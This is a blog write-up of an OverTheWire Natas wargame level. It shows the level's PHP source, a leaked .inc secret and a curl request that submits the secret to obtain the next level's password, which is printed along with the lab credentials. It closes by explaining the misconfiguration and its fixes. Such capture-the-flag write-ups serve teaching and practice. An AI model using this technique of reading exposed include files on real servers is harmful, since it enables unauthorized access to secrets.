| << Previous challenge |
Recommended reading:
- PHP (basics)
- POST Method
From the credentials discovered from the previous challenge, head up to http://natas6.natas.labs.overthewire.org and take a look at its content. This challenge involves some basic programming knowledge, PHP knowledge to be more specific, what it is and how it works.
This webpage contains a simple form, with a textbox and a button. We start by exploring the webpage: introducing some random characters on the textbox and submitting the form results on a "Wrong secret". We can assume that if we introduce the correct secret, we get the password for the next level.
They're kind enough to show us the full source code, which includes the PHP code that is executed on the server side, which you normally don't have access, since it's executed on the server. Here's what we have access to:
This webpage contains a simple form, with a textbox and a button. We start by exploring the webpage: introducing some random characters on the textbox and submitting the form results on a "Wrong secret". We can assume that if we introduce the correct secret, we get the password for the next level.
They're kind enough to show us the full source code, which includes the PHP code that is executed on the server side, which you normally don't have access, since it's executed on the server. Here's what we have access to:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 | <html> <head> <!-- This stuff in the header has nothing to do with the level --> <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css"> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" /> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" /> <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script> <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script> <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script> <script>var wechallinfo = { "level": "natas6", "pass": "<censored>" };</script></head> <body> <h1>natas6</h1> <div id="content"> <? include "includes/secret.inc"; if(array_key_exists("submit", $_POST)) { if($secret == $_POST['secret']) { print "Access granted. The password for natas7 is <censored>"; } else { print "Wrong secret"; } } ?> <form method=post> Input secret: <input name=secret><br> <input type=submit name=submit> </form> <div id="viewsource"><a href="index-source.html">View sourcecode</a></div> </div> </body> </html> |
1 2 3 | <? $secret = "FOEIUWGHFEEUHOFUOIU"; ?> |
curl --data "submit=submit&secret=FOEIUWGHFEEUHOFUOIU" http://natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1@natas6.natas.labs.overthewire.org
We send the secret and the submit variable as data, submit is also needed, the code also checks for that variable.
And the result:
VoilĂ , we get the password for natas7 in line 15, pretty straight forward.
And the result:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | <html> <head> <!-- This stuff in the header has nothing to do with the level --> <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css"> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" /> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" /> <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script> <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script> <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script> <script>var wechallinfo = { "level": "natas6", "pass": "aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1" };</script></head> <body> <h1>natas6</h1> <div id="content"> Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 <form method=post> Input secret: <input name=secret><br> <input type=submit name=submit> </form> <div id="viewsource"><a href="index-source.html">View sourcecode</a></div> </div> </body> </html> |
| User | natas7 |
| Password | 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 |
What's important to grasp here is the way the include file was set. The file has a .inc extension, which is fine, but in this case the server wasn't configured to parse the .inc as a PHP file, meaning when we open it, the server displays the file as plain text, revealing the PHP code.
Just like level 03 and level 02, this exploitation results from a poorly configured web server. Three easy solutions for this are: use .inc.php extension, always get parsed, deny access to any .inc files or configure the web server to parse .inc files.
Never Settle,
| << Previous challenge |
No comments:
Post a Comment